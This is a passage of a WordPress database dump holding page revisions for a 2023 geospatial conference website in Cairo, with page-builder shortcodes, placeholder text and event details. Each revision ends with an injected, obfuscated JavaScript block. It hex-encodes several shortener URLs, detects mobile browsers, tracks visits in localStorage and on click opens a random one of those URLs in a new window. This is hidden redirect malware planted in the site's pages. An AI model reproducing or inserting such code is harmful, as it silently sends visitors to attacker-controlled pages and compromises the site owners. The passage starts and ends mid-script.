|\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 23:10:42','2022-11-08 23:10:42','',3066,'https://gsw2023.com/?p=3113',0,'revision','',0),
(3114,1,'2022-11-08 23:12:08','2022-11-08 23:12:08','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1667949123077{background-image: url(https://gsw2023.com/wp-content/uploads/2022/10/11.jpg?id=2732) !important;}\"][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 23:12:08','2022-11-08 23:12:08','',3066,'https://gsw2023.com/?p=3114',0,'revision','',0),
(3116,1,'2022-11-08 23:34:26','2022-11-08 23:34:26','[vc_row][vc_column width=\"1/2\"][vc_column_text]\n<h3>EGYPT GSW\'2023</h3>\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\n\naaaaaaaaaaaa\n\n[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\n\naaaaaaaaaaaa\n\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\n\naaaaaaaaaaaa\n\n[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\n\naaaaaaaaaaaa\n\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1667949123077{background-image: url(https://gsw2023.com/wp-content/uploads/2022/10/11.jpg?id=2732) !important;}\"][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row]\n\n[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x